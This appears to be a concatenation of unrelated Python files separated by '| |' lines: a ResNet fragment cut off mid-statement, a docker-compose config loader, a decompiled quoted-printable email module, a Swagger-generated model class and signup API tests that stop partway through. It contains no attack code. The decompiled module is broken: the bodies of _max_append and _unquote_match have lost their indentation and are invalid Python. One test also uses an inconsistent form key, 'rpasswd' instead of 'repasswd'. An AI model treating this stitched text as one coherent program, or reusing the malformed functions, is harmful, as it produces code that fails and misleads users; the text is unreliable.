                   reuse=reuse, scope=scope)
resnet_v1_200.default_image_size = resnet_v1.default_image_size
| |
import logging
import os
import sys
from collections import namedtuple
import six
import yaml
from .errors import CircularReference
from .errors import ComposeFileNotFound
from .errors import ConfigurationError
from .interpolation import interpolate_environment_variables
from .validation import validate_against_schema
from .validation import validate_service_names
from .validation import validate_top_level_object
from compose.cli.utils import find_candidates_in_parent_dirs
# Service options that are passed through to the Docker API.
DOCKER_CONFIG_KEYS = [
    'cap_add',
    'cap_drop',
    'cpu_shares',
    'cpuset',
    'command',
    'detach',
    'devices',
    'dns',
    'dns_search',
    'domainname',
    'entrypoint',
    'env_file',
    'environment',
    'extra_hosts',
    'hostname',
    'image',
    'labels',
    'links',
    'mac_address',
    'mem_limit',
    'memswap_limit',
    'net',
    'log_driver',
    'log_opt',
    'pid',
    'ports',
    'privileged',
    'read_only',
    'restart',
    'security_opt',
    'stdin_open',
    'tty',
    'user',
    'volume_driver',
    'volumes',
    'volumes_from',
    'working_dir',
]
# All keys permitted in a service definition: Docker options plus
# compose-specific ones.
ALLOWED_KEYS = DOCKER_CONFIG_KEYS + [
    'build',
    'container_name',
    'dockerfile',
    'expose',
    'external_links',
    'load_image',
    'name'
]
# Config file names probed, in order, when none is given explicitly.
SUPPORTED_FILENAMES = [
    'docker-compose.yml',
    'docker-compose.yaml',
    'fig.yml',
    'fig.yaml',
]
# Leading characters that mark a volume's host part as a filesystem path;
# anything else may be treated as a named volume by newer Docker versions
# (see resolve_volume_path()).
PATH_START_CHARS = [
    '/',
    '.',
    '~',
]
log = logging.getLogger(__name__)
# (parsed config dict, directory containing the file, file name or None for stdin)
ConfigDetails = namedtuple('ConfigDetails', 'config working_dir filename')
def find(base_dir, filename):
    """Locate and parse the compose file, returning a ConfigDetails tuple."""
    if filename == '-':
        # '-' means the config comes from stdin; there is no file on disk.
        return ConfigDetails(yaml.safe_load(sys.stdin), os.getcwd(), None)
    config_path = os.path.join(base_dir, filename) if filename else get_config_path(base_dir)
    return ConfigDetails(load_yaml(config_path), os.path.dirname(config_path), config_path)
def get_config_path(base_dir):
    """
    Find the compose config file in base_dir or a parent directory.

    Warns about ambiguous or deprecated file names and returns the full
    path of the chosen file. Raises ComposeFileNotFound when none of the
    SUPPORTED_FILENAMES exist.
    """
    (candidates, path) = find_candidates_in_parent_dirs(SUPPORTED_FILENAMES, base_dir)
    if len(candidates) == 0:
        raise ComposeFileNotFound(SUPPORTED_FILENAMES)
    winner = candidates[0]
    if len(candidates) > 1:
        # log.warn() is a deprecated alias; log.warning() is the supported name.
        log.warning("Found multiple config files with supported names: %s", ", ".join(candidates))
        log.warning("Using %s\n", winner)
    if winner == 'docker-compose.yaml':
        log.warning("Please be aware that .yml is the expected extension "
                    "in most cases, and using .yaml can cause compatibility "
                    "issues in future.\n")
    if winner.startswith("fig."):
        log.warning("%s is deprecated and will not be supported in future. "
                    "Please rename your config file to docker-compose.yml\n", winner)
    return os.path.join(path, winner)
@validate_top_level_object
@validate_service_names
def pre_process_config(config):
    """
    Pre validation checks and processing of the config file to interpolate env
    vars returning a config dict ready to be tested against the schema.
    """
    return interpolate_environment_variables(config)
def load(config_details):
    """Build the list of fully resolved, validated service dicts."""
    config, working_dir, filename = config_details
    processed = pre_process_config(config)
    validate_against_schema(processed)
    services = []
    for service_name, raw_service in list(processed.items()):
        loader = ServiceLoader(working_dir=working_dir, filename=filename)
        resolved = loader.make_service_dict(service_name, raw_service)
        validate_paths(resolved)
        services.append(resolved)
    return services
class ServiceLoader(object):
    """
    Resolves a single service definition: environment/env_file handling and
    'extends' chains (possibly spanning files), with cycle detection.
    """
    def __init__(self, working_dir, filename=None, already_seen=None):
        # already_seen holds (filename, service_name) signatures of services
        # currently being resolved, used to detect circular 'extends'.
        self.working_dir = os.path.abspath(working_dir)
        if filename:
            self.filename = os.path.abspath(filename)
        else:
            self.filename = filename
        self.already_seen = already_seen or []
    def detect_cycle(self, name):
        """Raise CircularReference if *name* is already being resolved."""
        if self.signature(name) in self.already_seen:
            raise CircularReference(self.already_seen + [self.signature(name)])
    def make_service_dict(self, name, service_dict):
        """Return the fully resolved service dict for *name*."""
        service_dict = service_dict.copy()
        service_dict['name'] = name
        service_dict = resolve_environment(service_dict, working_dir=self.working_dir)
        service_dict = self.resolve_extends(service_dict)
        return process_container_options(service_dict, working_dir=self.working_dir)
    def resolve_extends(self, service_dict):
        """Merge in the base service referenced by 'extends', if present."""
        if 'extends' not in service_dict:
            return service_dict
        extends_options = self.validate_extends_options(service_dict['name'], service_dict['extends'])
        if self.working_dir is None:
            raise Exception("No working_dir passed to ServiceLoader()")
        if 'file' in extends_options:
            extends_from_filename = extends_options['file']
            other_config_path = expand_path(self.working_dir, extends_from_filename)
        else:
            # No explicit file: the base service lives in this same file.
            other_config_path = self.filename
        other_working_dir = os.path.dirname(other_config_path)
        other_already_seen = self.already_seen + [self.signature(service_dict['name'])]
        other_loader = ServiceLoader(
            working_dir=other_working_dir,
            filename=other_config_path,
            already_seen=other_already_seen,
        )
        base_service = extends_options['service']
        other_config = load_yaml(other_config_path)
        if base_service not in other_config:
            msg = (
                "Cannot extend service '%s' in %s: Service not found"
            ) % (base_service, other_config_path)
            raise ConfigurationError(msg)
        other_service_dict = other_config[base_service]
        other_loader.detect_cycle(extends_options['service'])
        # Recursively resolve the base service; it may itself extend others.
        other_service_dict = other_loader.make_service_dict(
            service_dict['name'],
            other_service_dict,
        )
        validate_extended_service_dict(
            other_service_dict,
            filename=other_config_path,
            service=extends_options['service'],
        )
        return merge_service_dicts(other_service_dict, service_dict)
    def signature(self, name):
        """Identity of a service occurrence: (config file path, service name)."""
        return (self.filename, name)
    def validate_extends_options(self, service_name, extends_options):
        """Check the 'extends' mapping; 'file' is mandatory when reading stdin."""
        error_prefix = "Invalid 'extends' configuration for %s:" % service_name
        if 'file' not in extends_options and self.filename is None:
            raise ConfigurationError(
                "%s you need to specify a 'file', e.g. 'file: something.yml'" % error_prefix
            )
        return extends_options
def validate_extended_service_dict(service_dict, filename, service):
    """Reject 'extends' base services that use non-inheritable options."""
    error_prefix = "Cannot extend service '%s' in %s:" % (service, filename)
    if 'links' in service_dict:
        raise ConfigurationError("%s services with 'links' cannot be extended" % error_prefix)
    if 'volumes_from' in service_dict:
        raise ConfigurationError("%s services with 'volumes_from' cannot be extended" % error_prefix)
    net_value = service_dict.get('net')
    if net_value is not None and get_service_name_from_net(net_value) is not None:
        raise ConfigurationError("%s services with 'net: container' cannot be extended" % error_prefix)
def process_container_options(service_dict, working_dir=None):
    """Resolve host paths and normalize labels on a single service dict."""
    result = service_dict.copy()
    if 'volumes' in result and result.get('volume_driver') is None:
        # Only rewrite host paths for the default volume driver.
        result['volumes'] = resolve_volume_paths(result, working_dir=working_dir)
    if 'build' in result:
        result['build'] = resolve_build_path(result['build'], working_dir=working_dir)
    if 'labels' in result:
        result['labels'] = parse_labels(result['labels'])
    return result
def merge_service_dicts(base, override):
    """
    Merge two service dicts (used by 'extends'); *override* wins on conflicts.

    Most keys are simply overridden, but environment, labels, path mappings
    and list-valued options are merged element-wise.
    """
    d = base.copy()
    if 'environment' in base or 'environment' in override:
        d['environment'] = merge_environment(
            base.get('environment'),
            override.get('environment'),
        )
    path_mapping_keys = ['volumes', 'devices']
    for key in path_mapping_keys:
        if key in base or key in override:
            d[key] = merge_path_mappings(
                base.get(key),
                override.get(key),
            )
    if 'labels' in base or 'labels' in override:
        d['labels'] = merge_labels(
            base.get('labels'),
            override.get('labels'),
        )
    # 'image' and 'build' are mutually exclusive: whichever one the override
    # specifies displaces the other inherited from the base.
    if 'image' in override and 'build' in d:
        del d['build']
    if 'build' in override and 'image' in d:
        del d['image']
    list_keys = ['ports', 'expose', 'external_links']
    for key in list_keys:
        if key in base or key in override:
            d[key] = base.get(key, []) + override.get(key, [])
    list_or_string_keys = ['dns', 'dns_search']
    for key in list_or_string_keys:
        if key in base or key in override:
            d[key] = to_list(base.get(key)) + to_list(override.get(key))
    already_merged_keys = ['environment', 'labels'] + path_mapping_keys + list_keys + list_or_string_keys
    # Everything else: the override value simply replaces the base value.
    for k in set(ALLOWED_KEYS) - set(already_merged_keys):
        if k in override:
            d[k] = override[k]
    return d
def merge_environment(base, override):
    """
    Merge two environment specs; *override* entries win.

    A fresh dict is always returned: parse_environment() returns its argument
    unchanged when given a dict, so updating it in place would mutate the
    caller's service definition.
    """
    env = dict(parse_environment(base))
    env.update(parse_environment(override))
    return env
def get_env_files(options, working_dir=None):
    """
    Return absolute paths of the env files listed for a service.

    Returns an empty list when no 'env_file' key is present; the previous
    implementation returned {} here, giving the function an inconsistent
    return type (dict vs list).
    """
    if 'env_file' not in options:
        return []
    if working_dir is None:
        raise Exception("No working_dir passed to get_env_files()")
    env_files = options.get('env_file', [])
    # A single string is allowed as shorthand for a one-element list.
    if not isinstance(env_files, list):
        env_files = [env_files]
    return [expand_path(working_dir, path) for path in env_files]
def resolve_environment(service_dict, working_dir=None):
    """
    Collapse 'env_file' and 'environment' options into a single 'environment'
    dict; values of None are resolved from os.environ (or '' when unset).
    """
    service_dict = service_dict.copy()
    if 'environment' not in service_dict and 'env_file' not in service_dict:
        return service_dict
    env = {}
    if 'env_file' in service_dict:
        # Later env files override earlier ones; explicit 'environment'
        # entries override all env files.
        for f in get_env_files(service_dict, working_dir=working_dir):
            env.update(env_vars_from_file(f))
        del service_dict['env_file']
    env.update(parse_environment(service_dict.get('environment')))
    env = dict(resolve_env_var(k, v) for k, v in six.iteritems(env))
    service_dict['environment'] = env
    return service_dict
def parse_environment(environment):
    """Normalize an environment option (list of 'K=V' strings or dict) to a dict."""
    if not environment:
        return {}
    if isinstance(environment, dict):
        return environment
    if isinstance(environment, list):
        return dict(split_env(entry) for entry in environment)
    raise ConfigurationError(
        "environment \"%s\" must be a list or mapping," %
        environment
    )
def split_env(env):
    """
    Split 'KEY=value' into a (key, value) tuple; value is None when no '='.

    Always returns a tuple: the previous implementation returned a list for
    the 'KEY=value' case and a tuple otherwise.
    """
    if '=' in env:
        key, value = env.split('=', 1)
        return key, value
    return env, None
def resolve_env_var(key, val):
    """Return (key, value); a None value falls back to os.environ, then ''."""
    if val is not None:
        return key, val
    return key, os.environ.get(key, '')
def env_vars_from_file(filename):
    """
    Read in a line delimited file of environment variables.

    Blank lines and lines starting with '#' are ignored. Raises
    ConfigurationError when the file does not exist.
    """
    if not os.path.exists(filename):
        raise ConfigurationError("Couldn't find env file: %s" % filename)
    env = {}
    # Use a context manager so the handle is closed deterministically instead
    # of leaking until garbage collection.
    with open(filename, 'r') as fileobj:
        for line in fileobj:
            line = line.strip()
            if line and not line.startswith('#'):
                k, v = split_env(line)
                env[k] = v
    return env
def resolve_volume_paths(service_dict, working_dir=None):
    """Expand every volume spec's host path relative to working_dir."""
    if working_dir is None:
        raise Exception("No working_dir passed to resolve_volume_paths()")
    service_name = service_dict['name']
    return [resolve_volume_path(volume, working_dir, service_name)
            for volume in service_dict['volumes']]
def resolve_volume_path(volume, working_dir, service_name):
    """
    Expand a single volume spec: '~' and relative host paths are resolved
    against working_dir; container-only specs pass through unchanged.
    """
    container_path, host_path = split_path_mapping(volume)
    container_path = os.path.expanduser(container_path)
    if host_path is not None:
        if not any(host_path.startswith(c) for c in PATH_START_CHARS):
            # log.warn() is a deprecated alias; log.warning() is the
            # supported name.
            log.warning(
                'Warning: the mapping "{0}:{1}" in the volumes config for '
                'service "{2}" is ambiguous. In a future version of Docker, '
                'it will designate a "named" volume '
                '(see https://github.com/docker/docker/pull/14242). '
                'To prevent unexpected behaviour, change it to "./{0}:{1}"'
                .format(host_path, container_path, service_name)
            )
        host_path = os.path.expanduser(host_path)
        return "%s:%s" % (expand_path(working_dir, host_path), container_path)
    else:
        return container_path
def resolve_build_path(build_path, working_dir=None):
    """Make a service's build context path absolute relative to working_dir."""
    if working_dir is None:
        raise Exception("No working_dir passed to resolve_build_path")
    return expand_path(working_dir, build_path)
def validate_paths(service_dict):
    """Raise ConfigurationError when a service's build path is unusable."""
    if 'build' not in service_dict:
        return
    build_path = service_dict['build']
    if not (os.path.exists(build_path) and os.access(build_path, os.R_OK)):
        raise ConfigurationError("build path %s either does not exist or is not accessible." % build_path)
def merge_path_mappings(base, override):
    """Merge volume/device mappings keyed by container path; override wins."""
    merged = dict_from_path_mappings(base)
    merged.update(dict_from_path_mappings(override))
    return path_mappings_from_dict(merged)
def dict_from_path_mappings(path_mappings):
    """Convert 'host:container' strings into a {container: host} dict."""
    if not path_mappings:
        return {}
    return dict(split_path_mapping(mapping) for mapping in path_mappings)
def path_mappings_from_dict(d):
    """Inverse of dict_from_path_mappings(): dict back to volume strings."""
    return [join_path_mapping(item) for item in d.items()]
def split_path_mapping(string):
    """Split 'host:container' into (container, host); host is None if absent."""
    host, sep, container = string.partition(':')
    if sep:
        return (container, host)
    return (string, None)
def join_path_mapping(pair):
    """Inverse of split_path_mapping(): (container, host) -> volume string."""
    container, host = pair
    return container if host is None else ":".join((host, container))
def merge_labels(base, override):
    """
    Merge two label specs; *override* entries win.

    A fresh dict is always returned: parse_labels() returns its argument
    unchanged when given a dict, so updating it in place would mutate the
    caller's service definition.
    """
    labels = dict(parse_labels(base))
    labels.update(parse_labels(override))
    return labels
def parse_labels(labels):
    """
    Normalize a labels option (list of 'k=v' strings or dict) to a dict.

    Raises ConfigurationError for any other type instead of silently falling
    through and returning None (mirrors parse_environment()).
    """
    if not labels:
        return {}
    if isinstance(labels, list):
        return dict(split_label(e) for e in labels)
    if isinstance(labels, dict):
        return labels
    raise ConfigurationError(
        "labels \"%s\" must be a list or mapping" %
        labels
    )
def split_label(label):
    """Split 'key=value' into its parts; value defaults to '' when no '='."""
    if '=' not in label:
        return label, ''
    return label.split('=', 1)
def expand_path(working_dir, path):
    """Return *path* made absolute relative to *working_dir*."""
    joined = os.path.join(working_dir, path)
    return os.path.abspath(joined)
def to_list(value):
    """Wrap a scalar string into a list; None becomes []; sequences pass through."""
    if value is None:
        return []
    if isinstance(value, six.string_types):
        return [value]
    return value
def get_service_name_from_net(net_config):
    """Extract the name from a 'container:<name>' net value, else None."""
    if not net_config or not net_config.startswith('container:'):
        return None
    return net_config.split(':', 1)[1]
def load_yaml(filename):
    """Parse a YAML file, wrapping I/O failures in ConfigurationError."""
    try:
        with open(filename, 'r') as config_file:
            return yaml.safe_load(config_file)
    except IOError as error:
        raise ConfigurationError(six.text_type(error))
| |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: quoprimime.py
"""Quoted-printable content transfer encoding per RFCs 2045-2047.
This module handles the content transfer encoding method defined in RFC 2045
to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to
safely encode text that is in a character set similar to the 7-bit US ASCII
character set, but that includes some 8-bit characters that are normally not
allowed in email bodies or headers.
Quoted-printable is very space-inefficient for encoding binary files; use the
email.base64mime module for that instead.
This module provides an interface to encode and decode both headers and bodies
with quoted-printable encoding.
RFC 2045 defines a method for including character set information in an
`encoded-word' in a header. This method is commonly used for 8-bit real names
in To:/From:/Cc: etc. fields, as well as Subject: lines.
This module does not do the line wrapping or end-of-line character
conversion necessary for proper internationalized headers; it only
does dumb encoding and decoding. To deal with the various line
wrapping issues, use the email.header module.
"""
__all__ = [
    'body_decode',
    'body_encode',
    'body_quopri_check',
    'body_quopri_len',
    'decode',
    'decodestring',
    'encode',
    'encodestring',
    'header_decode',
    'header_encode',
    'header_quopri_check',
    'header_quopri_len',
    'quote',
    'unquote']
import re
from string import hexdigits
from email.utils import fix_eols
CRLF = '\r\n'
NL = '\n'
# Overhead of the "=?charset?q?...?=" framing used by header encoding:
# "=?" + "?q?" + "?=" is 7 characters.
MISC_LEN = 7
# Characters that must be escaped in header (RFC 2047 "Q") encoding.
hqre = re.compile('[^-a-zA-Z0-9!*+/ ]')
# Characters that must be escaped in body quoted-printable encoding.
bqre = re.compile('[^ !-<>-~\\t]')
def header_quopri_check(c):
    """Return True if character *c* must be escaped with header quopri."""
    return hqre.match(c) is not None
def body_quopri_check(c):
    """Return True if character *c* must be escaped with body quopri."""
    return bqre.match(c) is not None
def header_quopri_len(s):
    """Length of *s* after header-quopri encoding ('=XX' costs 3 chars)."""
    return sum(3 if hqre.match(c) else 1 for c in s)
def body_quopri_len(str):
    """Length of *str* after body-quopri encoding ('=XX' costs 3 chars)."""
    # NOTE: the parameter name shadows the builtin 'str'; kept for interface
    # compatibility with keyword callers.
    return sum(3 if bqre.match(c) else 1 for c in str)
def _max_append(L, s, maxlen, extra=''):
if not L:
L.append(s.lstrip())
elif len(L[-1]) + len(s) <= maxlen:
L[-1] += extra + s
else:
L.append(s.lstrip())
def unquote(s):
    """Turn an '=AB' escape into the ASCII character with value 0xAB."""
    hexpair = s[1:3]
    return chr(int(hexpair, 16))
def quote(c):
    """Render character *c* as a quoted-printable '=XX' escape."""
    return '={:02X}'.format(ord(c))
def header_encode(header, charset='iso-8859-1', keep_eols=False, maxlinelen=76, eol=NL):
    r"""Encode a single header line with quoted-printable (like) encoding.
    Defined in RFC 2045, this `Q' encoding is similar to quoted-printable, but
    used specifically for email header fields to allow charsets with mostly 7
    bit characters (and some 8 bit) to remain more or less readable in non-RFC
    2045 aware mail clients.
    charset names the character set to use to encode the header.  It defaults
    to iso-8859-1.
    The resulting string will be in the form:
    "=?charset?q?I_f=E2rt_in_your_g=E8n=E8ral_dire=E7tion?\n
      =?charset?q?Silly_=C8nglish_Kn=EEghts?="
    with each line wrapped safely at, at most, maxlinelen characters (defaults
    to 76 characters).  If maxlinelen is None, the entire string is encoded in
    one chunk with no splitting.
    End-of-line characters (\r, \n, \r\n) will be automatically converted
    to the canonical email line separator \r\n unless the keep_eols
    parameter is True (the default is False).
    Each line of the header will be terminated in the value of eol, which
    defaults to "\n".  Set this to "\r\n" if you are using the result of
    this function directly in email.
    """
    if not header:
        return header
    else:
        if not keep_eols:
            header = fix_eols(header)
        # Chunks of encoded text, each at most max_encoded characters long.
        quoted = []
        if maxlinelen is None:
            # Effectively unlimited: everything lands in one chunk.
            max_encoded = 100000
        else:
            # Budget per chunk once the '=?charset?q?...?=' wrapper is added.
            max_encoded = maxlinelen - len(charset) - MISC_LEN - 1
        for c in header:
            if c == ' ':
                # RFC 2047: space is encoded as underscore in 'Q' encoding.
                _max_append(quoted, '_', max_encoded)
            elif not hqre.match(c):
                # Safe character; pass through unescaped.
                _max_append(quoted, c, max_encoded)
            else:
                _max_append(quoted, '=%02X' % ord(c), max_encoded)
        # Wrap each chunk as an encoded-word; continuation lines are indented
        # by one space per the header folding convention.
        joiner = eol + ' '
        return joiner.join([ '=?%s?q?%s?=' % (charset, line) for line in quoted ])
def encode(body, binary=False, maxlinelen=76, eol=NL):
    r"""Encode with quoted-printable, wrapping at maxlinelen characters.
    If binary is False (the default), end-of-line characters will be converted
    to the canonical email end-of-line sequence \r\n.  Otherwise they will
    be left verbatim.
    Each line of encoded text will end with eol, which defaults to "\n".  Set
    this to "\r\n" if you will be using the result of this function directly
    in an email.
    Each line will be wrapped at, at most, maxlinelen characters (defaults to
    76 characters).  Long lines will have the `soft linefeed' quoted-printable
    character "=" appended to them, so the decoded text will be identical to
    the original text.
    """
    if not body:
        return body
    else:
        if not binary:
            body = fix_eols(body)
        encoded_body = ''
        lineno = -1
        # keepends=True: we need the original line endings to decide whether
        # to emit a hard line break at the end of each encoded line.
        lines = body.splitlines(1)
        for line in lines:
            # Strip the line ending; it is re-added (as eol) after encoding.
            if line.endswith(CRLF):
                line = line[:-2]
            elif line[-1] in CRLF:
                line = line[:-1]
            lineno += 1
            encoded_line = ''
            prev = None
            linelen = len(line)
            for j in range(linelen):
                c = line[j]
                prev = c
                if bqre.match(c):
                    c = quote(c)
                elif j + 1 == linelen:
                    # Last character of the line: trailing whitespace is
                    # deferred to the 'prev' handling below.
                    if c not in ' \t':
                        encoded_line += c
                    prev = c
                    continue
                if len(encoded_line) + len(c) >= maxlinelen:
                    # Soft line break: '=' + eol continues the logical line.
                    encoded_body += encoded_line + '=' + eol
                    encoded_line = ''
                encoded_line += c
            # Trailing whitespace must be protected so it survives transport.
            if prev and prev in ' \t':
                if lineno + 1 == len(lines):
                    # Whitespace at the very end of the body: escape it.
                    prev = quote(prev)
                    if len(encoded_line) + len(prev) > maxlinelen:
                        encoded_body += encoded_line + '=' + eol + prev
                    else:
                        encoded_body += encoded_line + prev
                else:
                    # Mid-body: keep the whitespace and soft-break after it.
                    encoded_body += encoded_line + prev + '=' + eol
                encoded_line = ''
            # Emit a hard line break only if the source line had one.
            if lines[lineno].endswith(CRLF) or lines[lineno][-1] in CRLF:
                encoded_body += encoded_line + eol
            else:
                encoded_body += encoded_line
            encoded_line = ''
        return encoded_body
body_encode = encode
encodestring = encode
def decode(encoded, eol=NL):
    r"""Decode a quoted-printable string.
    Lines are separated with eol, which defaults to \n.
    """
    if not encoded:
        return encoded
    decoded = ''
    for line in encoded.splitlines():
        line = line.rstrip()
        if not line:
            decoded += eol
            continue
        i = 0
        n = len(line)
        while i < n:
            c = line[i]
            if c != '=':
                decoded += c
                i += 1
            elif i + 1 == n:
                # '=' at end of line is a soft break: swallow it, no eol.
                i += 1
                continue
            elif i + 2 < n and line[i + 1] in hexdigits and line[i + 2] in hexdigits:
                # Well-formed '=XY' escape.
                decoded += unquote(line[i:i + 3])
                i += 3
            else:
                # Malformed escape: keep the '=' literally (robustness).
                decoded += c
                i += 1
            if i == n:
                decoded += eol
    # Undo the trailing eol when the input did not end with one.
    # NOTE(review): the [:-1] slice assumes a one-character eol — confirm
    # behavior for eol='\r\n'.
    if not encoded.endswith(eol) and decoded.endswith(eol):
        decoded = decoded[:-1]
    return decoded
body_decode = decode
decodestring = decode
def _unquote_match(match):
"""Turn a match in the form =AB to the ASCII character with value 0xab"""
s = match.group(0)
return unquote(s)
def header_decode(s):
    """Decode a string encoded with RFC 2045 MIME header `Q' encoding.

    This does not parse a full encoded-word (=?iso-8895-1?q?Hello_World?=);
    use the high level email.header class for that functionality.
    """
    # 'Q' encoding maps spaces to underscores; undo that first, then expand
    # every '=XY' escape back to its character.
    unquoted = s.replace('_', ' ')
    return re.sub(
        '=[a-fA-F0-9]{2}',
        lambda match: chr(int(match.group(0)[1:3], 16)),
        unquoted)
| |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ActorResponse(object):
    """Swagger model for an actor resource.

    NOTE: originally auto generated by the swagger code generator program;
    edited to make equality robust against non-model objects and to drop the
    ``six`` dependency in ``to_dict`` (``dict.items`` works on py2 and py3).
    """

    def __init__(self, id=None, name=None, description_short=None, description=None, image=None, images=None, meta_title=None, meta_description=None, meta_keywords=None, link_rewrite=None, roles=None, active=None, date_add=None, date_upd=None):
        """
        ActorResponse - a model defined in Swagger

        :param dict swagger_types: attribute name -> swagger type string.
        :param dict attribute_map: attribute name -> json key in definition.
        """
        # Swagger type declaration for every serializable attribute.
        self.swagger_types = {
            'id': 'int',
            'name': 'str',
            'description_short': 'list[I18nField]',
            'description': 'list[I18nField]',
            'image': 'str',
            'images': 'list[Image]',
            'meta_title': 'list[I18nField]',
            'meta_description': 'list[I18nField]',
            'meta_keywords': 'list[I18nField]',
            'link_rewrite': 'list[I18nField]',
            'roles': 'list[I18nField]',
            'active': 'bool',
            'date_add': 'str',
            'date_upd': 'str'
        }
        # Attribute name -> JSON key (identity mapping for this model).
        self.attribute_map = {
            'id': 'id',
            'name': 'name',
            'description_short': 'description_short',
            'description': 'description',
            'image': 'image',
            'images': 'images',
            'meta_title': 'meta_title',
            'meta_description': 'meta_description',
            'meta_keywords': 'meta_keywords',
            'link_rewrite': 'link_rewrite',
            'roles': 'roles',
            'active': 'active',
            'date_add': 'date_add',
            'date_upd': 'date_upd'
        }
        self._id = id
        self._name = name
        self._description_short = description_short
        self._description = description
        self._image = image
        self._images = images
        self._meta_title = meta_title
        self._meta_description = meta_description
        self._meta_keywords = meta_keywords
        self._link_rewrite = link_rewrite
        self._roles = roles
        self._active = active
        self._date_add = date_add
        self._date_upd = date_upd

    @property
    def id(self):
        """Gets the id of this ActorResponse (int)."""
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this ActorResponse."""
        self._id = id

    @property
    def name(self):
        """Gets the name of this ActorResponse (str)."""
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this ActorResponse."""
        self._name = name

    @property
    def description_short(self):
        """Gets the description_short of this ActorResponse (list[I18nField])."""
        return self._description_short

    @description_short.setter
    def description_short(self, description_short):
        """Sets the description_short of this ActorResponse."""
        self._description_short = description_short

    @property
    def description(self):
        """Gets the description of this ActorResponse (list[I18nField])."""
        return self._description

    @description.setter
    def description(self, description):
        """Sets the description of this ActorResponse."""
        self._description = description

    @property
    def image(self):
        """Gets the image of this ActorResponse (str)."""
        return self._image

    @image.setter
    def image(self, image):
        """Sets the image of this ActorResponse."""
        self._image = image

    @property
    def images(self):
        """Gets the images of this ActorResponse (list[Image])."""
        return self._images

    @images.setter
    def images(self, images):
        """Sets the images of this ActorResponse."""
        self._images = images

    @property
    def meta_title(self):
        """Gets the meta_title of this ActorResponse (list[I18nField])."""
        return self._meta_title

    @meta_title.setter
    def meta_title(self, meta_title):
        """Sets the meta_title of this ActorResponse."""
        self._meta_title = meta_title

    @property
    def meta_description(self):
        """Gets the meta_description of this ActorResponse (list[I18nField])."""
        return self._meta_description

    @meta_description.setter
    def meta_description(self, meta_description):
        """Sets the meta_description of this ActorResponse."""
        self._meta_description = meta_description

    @property
    def meta_keywords(self):
        """Gets the meta_keywords of this ActorResponse (list[I18nField])."""
        return self._meta_keywords

    @meta_keywords.setter
    def meta_keywords(self, meta_keywords):
        """Sets the meta_keywords of this ActorResponse."""
        self._meta_keywords = meta_keywords

    @property
    def link_rewrite(self):
        """Gets the link_rewrite of this ActorResponse (list[I18nField])."""
        return self._link_rewrite

    @link_rewrite.setter
    def link_rewrite(self, link_rewrite):
        """Sets the link_rewrite of this ActorResponse."""
        self._link_rewrite = link_rewrite

    @property
    def roles(self):
        """Gets the roles of this ActorResponse (list[I18nField])."""
        return self._roles

    @roles.setter
    def roles(self, roles):
        """Sets the roles of this ActorResponse."""
        self._roles = roles

    @property
    def active(self):
        """Gets the active flag of this ActorResponse (bool)."""
        return self._active

    @active.setter
    def active(self, active):
        """Sets the active flag of this ActorResponse."""
        self._active = active

    @property
    def date_add(self):
        """Gets the date_add of this ActorResponse (str)."""
        return self._date_add

    @date_add.setter
    def date_add(self, date_add):
        """Sets the date_add of this ActorResponse."""
        self._date_add = date_add

    @property
    def date_upd(self):
        """Gets the date_upd of this ActorResponse (str)."""
        return self._date_upd

    @date_upd.setter
    def date_upd(self, date_upd):
        """Sets the date_upd of this ActorResponse."""
        self._date_upd = date_upd

    def to_dict(self):
        """
        Returns the model properties as a dict, recursing into nested models.
        """
        result = {}
        # dict.items() replaces six.iteritems: works on both py2 and py3.
        for attr, _ in self.swagger_types.items():
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are ActorResponse instances with equal
        attributes.  BUG FIX: the generated code accessed other.__dict__
        unconditionally and raised AttributeError when compared with
        unrelated objects (e.g. strings, None).
        """
        if not isinstance(other, ActorResponse):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| |
#!/usr/bin/env python3
import sys
import requests
import json
import unittest
import datetime
from util import TestCase
import common
import config
class TestApiUserSignup(TestCase):
    """Field-validation and end-to-end flow tests for the signup endpoint."""

    url = "%s/api/users/signup/" % (config.base_url,)

    def _signup(self, data):
        """POST *data* to the signup endpoint and return the closed response."""
        res = requests.post(self.url, data=data)
        res.connection.close()
        return res

    def _check(self, res, status_code, msg):
        """Assert *res* carries *status_code* and a body whose msg is *msg*."""
        self.assertEqualR(res, {
            "status_code": status_code,
            "body": {"msg": msg},
        })

    def _delete(self, user_id, token):
        """DELETE the user *user_id* using *token*; return the closed response."""
        res = requests.delete(
            '%s/api/users/%s/' % (config.base_url, user_id),
            data={'token': token})
        res.connection.close()
        return res

    def test_account(self):
        """A missing or empty 'account' field is rejected with 400."""
        # NOTE(review): 'rpasswd' looks like a typo for 'repasswd', but the
        # account check fires first so the test still exercises its target.
        data = {
            'email': config.user_test_email,
            'passwd': config.user_test_password,
            'rpasswd': config.user_test_password,
        }
        self._check(self._signup(data), 400, 'account not in form')
        data['account'] = ''
        self._check(self._signup(data), 400,
                    'value of account: "" should not be empty value')

    def test_email(self):
        """A missing or empty 'email' field is rejected with 400."""
        data = {
            'account': config.user_test_account,
            'passwd': config.user_test_password,
            'repasswd': config.user_test_password,
        }
        self._check(self._signup(data), 400, 'email not in form')
        data['email'] = ''
        self._check(self._signup(data), 400,
                    'value of email: "" should not be empty value')

    def test_passwd(self):
        """A missing or empty 'passwd' field is rejected with 400."""
        data = {
            'email': config.user_test_email,
            'account': config.user_test_account,
            'rpasswd': config.user_test_password,
        }
        self._check(self._signup(data), 400, 'passwd not in form')
